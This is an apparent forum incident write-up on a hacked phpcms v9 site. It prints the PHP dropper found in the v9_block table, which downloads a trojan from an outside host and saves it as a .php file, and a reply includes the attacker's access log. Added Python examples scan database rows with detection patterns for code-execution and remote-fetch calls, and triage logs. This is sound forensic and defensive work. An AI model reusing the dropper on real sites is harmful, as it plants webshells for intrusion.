Posted on 2018-5-14 15:25:33
A website built with phpcms v9: when I opened the home page today, I found the site displaying abnormally. Screenshot below:
01.png


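At first I suspected that malicious code had been planted in the hosting space, so I immediately logged in over FTP to look at the web files there. I checked whether the site template files had been modified and found nothing abnormal. I then compared the phpcms v9 source files against the files in the hosting space and again found no modified files. I also downloaded the site to my local machine, and the scan found no trojan files either. It felt very strange; for a while I was stuck and could not find a way forward.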

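After thinking it over for quite a long time, I finally found a lead: could the malicious code have been written into the database? So I used the phpmyadmin database management software to open the database remotely and looked through the relevant tables, and eventually found the malicious code in the "v9_block" block (碎片) data table. How was this code written in there? I thought it over carefully: this block code should be addable from the site's admin back end. So I logged in to the admin back end with an administrator account, and the site administrator does indeed have a feature for adding blocks. At this point, I finally understood how this malicious code was inserted. Below is a screenshot of the malicious code inserted in the admin back end: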

02.png

The inserted malicious code is as follows:
<?php
$f=file_get_contents('http://www.bfbcp07.com/cywlteam123.txt');print_r(fwrite(fopen('cywlteam123.php','a'),$f));phpinfo();
?>
The file 'http://www.bfbcp07.com/cywlteam123.txt' referenced in this code is a script trojan file; opened, its contents are as follows:

03.png

Hacker attack log and flow:
04.png

05.png

06.png
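
Added example, not part of the original post: a scan of rows exported from the `v9_block` table for server-side code, which is the content a file-based comparison or malware scan never sees. The column names (`id`, `name`, `data`) and the marker list are assumptions; the sample rows are constructed.

```python
import re

# Markers of server-side code in content that should be plain HTML/text.
# Assumption: this list is chosen to cover the dropper pattern shown above
# (remote fetch + local file write); it is not a complete webshell signature set.
MARKERS = {
    "php_open_tag": re.compile(r"<\?(php|=)", re.I),
    "remote_fetch": re.compile(
        r"\b(file_get_contents|fopen|curl_init|copy)\s*\(\s*['\"](https?|ftp)://", re.I),
    "file_write": re.compile(r"\b(fwrite|fputs|file_put_contents)\s*\(", re.I),
    "code_exec": re.compile(
        r"\b(eval|assert|system|passthru|shell_exec|create_function)\s*\(", re.I),
    "info_leak": re.compile(r"\bphpinfo\s*\(", re.I),
}

def scan_rows(rows, text_columns):
    """Return [(row_id, column, [marker names])] for rows holding code-like content."""
    findings = []
    for row in rows:
        for col in text_columns:
            value = row.get(col) or ""          # NULL columns come back as None
            hits = sorted(name for name, rx in MARKERS.items() if rx.search(value))
            if hits:
                findings.append((row["id"], col, hits))
    return findings

# Constructed sample rows; the URL and file names are placeholders.
SAMPLE_ROWS = [
    {"id": 1, "name": "footer", "data": "<p>Copyright 2018</p>"},
    {"id": 2, "name": "test", "data":
        "<?php $f=file_get_contents('http://example.invalid/x.txt');"
        "print_r(fwrite(fopen('x.php','a'),$f));phpinfo(); ?>"},
    {"id": 3, "name": "notice", "data": None},
]

if __name__ == "__main__":
    for row_id, col, hits in scan_rows(SAMPLE_ROWS, ["name", "data"]):
        print(f"v9_block id={row_id} column={col}: {', '.join(hits)}")
```

The same function can be pointed at any table whose text columns are rendered into pages; a hit is a lead for manual review, not proof of compromise.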


All comments: 1
灰儿 posted on 2018-5-14 18:21:29
114.227.103.150 - - [13/May/2018:22:31:12 +0800] "GET / HTTP/1.1" 200 12083 "https://www.sogou.com/link?url=DSOYnZeCC_pU0ia26t2md2QJ6AJM-tu1reaVHN88tHY." "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:15 +0800] "GET /uploadfile/2013/0730/20130730031210319.php HTTP/1.1" 404 470 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:15 +0800] "GET /index.php?m=poster&c=index&a=show_poster&id=2 HTTP/1.1" 200 280 "http://www.shxcb.gov.cn/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:32 +0800] "GET /index.php?m=admin&c=index&pc_hash=B1NGqW HTTP/1.1" 200 1607 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:35 +0800] "GET /api.php?op=checkcode&code_len=4&font_size=20&width=130&height=50&font_color=&background= HTTP/1.1" 200 4006 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&pc_hash=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:42 +0800] "POST /index.php?m=admin&c=index&a=login&dosubmit=1 HTTP/1.1" 200 2114 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&pc_hash=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:44 +0800] "GET /index.php?m=admin&c=index&pc_hash=Ev3Dvi HTTP/1.1" 200 6320 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&dosubmit=1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:44 +0800] "GET /index.php?m=admin&c=index&pc_hash=Ev3Dvi HTTP/1.1" 200 6320 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&dosubmit=1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:46 +0800] "GET /index.php?m=admin&c=index&a=public_main HTTP/1.1" 200 2633 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:47 +0800] "GET /index.php?m=admin&c=index&a=public_menu_left&menuid=10 HTTP/1.1" 200 897 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:49 +0800] "POST /index.php?m=admin&c=index&a=public_menu_left&menuid=4 HTTP/1.1" 200 1285 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:49 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=4 HTTP/1.1" 200 427 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:51 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=857 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:51 +0800] "GET /index.php?m=attachment&c=manage&a=init&menuid=857&pc_hash=Ev3Dvi HTTP/1.1" 200 5018 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:52 +0800] "GET /index.php?m=attachment&c=manage&a=init&menuid=857&pc_hash=Ev3Dvi HTTP/1.1" 200 5018 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:52 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=868 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:52 +0800] "GET /index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi HTTP/1.1" 200 2985 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:53 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=857 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:54 +0800] "GET /statics/images/admin_img/input.png HTTP/1.1" 200 1141 "http://www.shxcb.gov.cn/statics/css/table_form.css" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:03 +0800] "GET /index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi HTTP/1.1" 200 4707 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:07 +0800] "GET /index.php?m=admin&c=category&a=public_tpl_file_list&style=shxcb&module=special&templates=index|list|show&name=special HTTP/1.1" 200 616 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:09 +0800] "GET /index.php?clientid=title&title=test&pc_hash=Ev3Dvi&m=special&c=special&a=public_check_special&_=1526221929587 HTTP/1.1" 200 418 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:15 +0800] "POST /index.php?m=special&c=special&a=add HTTP/1.1" 200 1681 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:17 +0800] "GET /index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi HTTP/1.1" 200 4707 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:18 +0800] "GET /index.php?m=admin&c=category&a=public_tpl_file_list&style=shxcb&module=special&templates=index|list|show&name=special HTTP/1.1" 200 616 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:20 +0800] "GET /index.php?clientid=title&title=tt&pc_hash=Ev3Dvi&m=special&c=special&a=public_check_special&_=1526221939764 HTTP/1.1" 200 418 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:33 +0800] "POST /index.php?m=special&c=special&a=add HTTP/1.1" 200 1681 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:37 +0800] "GET /index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi HTTP/1.1" 200 3241 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:37 +0800] "GET /index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi HTTP/1.1" 200 4702 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:37 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=868 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:38 +0800] "GET /1.jpg HTTP/1.1" 404 433 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:40 +0800] "GET /html/special/test/?pc_hash=Ev3Dvi HTTP/1.1" 200 264 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:43 +0800] "GET /cywlteam123.php HTTP/1.1" 404 443 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"

access_20180513_黑客攻击日志.log (51.4 KB, downloads: 0)
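
Added example, not part of the original thread: a triage pass over an access log in the format above that groups requests by client IP and keeps the clients that both posted to the admin login and requested `.php` paths outside the site's known entry points. The `KNOWN_ENTRY` set is an assumption; the sample lines are constructed from the request paths in the log above, with documentation IP addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip, timestamp, method, target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: the only PHP entry points this site legitimately serves.
KNOWN_ENTRY = {"/index.php", "/api.php"}

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    return {"ip": ip, "ts": ts, "method": method, "path": url.path,
            "q": query, "status": int(status)}

def suspicious_sessions(lines):
    """Group by client IP; keep IPs with an admin login POST and unknown .php requests."""
    state = {}
    for rec in filter(None, map(parse, lines)):
        s = state.setdefault(rec["ip"], {"login": False, "posts": [], "probes": []})
        q, post = rec["q"], rec["method"] == "POST"
        if post and q.get("m") == "admin" and q.get("a") == "login":
            s["login"] = True  # a login attempt; HTTP 200 alone does not prove success
        elif post and s["login"] and rec["path"] == "/index.php":
            s["posts"].append((q.get("m"), q.get("c"), q.get("a")))
        elif rec["path"].endswith(".php") and rec["path"] not in KNOWN_ENTRY:
            s["probes"].append((rec["path"], rec["status"]))
    return {ip: s for ip, s in state.items() if s["login"] and s["probes"]}

# Constructed lines modelled on the log above; IPs are documentation addresses.
SAMPLE = [
    '203.0.113.10 - - [13/May/2018:22:31:15 +0800] "GET /uploadfile/2013/0730/20130730031210319.php HTTP/1.1" 404 470 "-" "UA"',
    '203.0.113.10 - - [13/May/2018:22:31:42 +0800] "POST /index.php?m=admin&c=index&a=login&dosubmit=1 HTTP/1.1" 200 2114 "-" "UA"',
    '203.0.113.10 - - [13/May/2018:22:32:15 +0800] "POST /index.php?m=special&c=special&a=add HTTP/1.1" 200 1681 "-" "UA"',
    '203.0.113.10 - - [13/May/2018:22:32:43 +0800] "GET /cywlteam123.php HTTP/1.1" 404 443 "-" "UA"',
    '198.51.100.7 - - [13/May/2018:22:33:00 +0800] "GET /index.php?m=content&c=index&a=lists&catid=6 HTTP/1.1" 200 9000 "-" "UA"',
]

if __name__ == "__main__":
    for ip, s in suspicious_sessions(SAMPLE).items():
        print(ip, "admin POSTs:", s["posts"], "unknown .php:", s["probes"])
```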
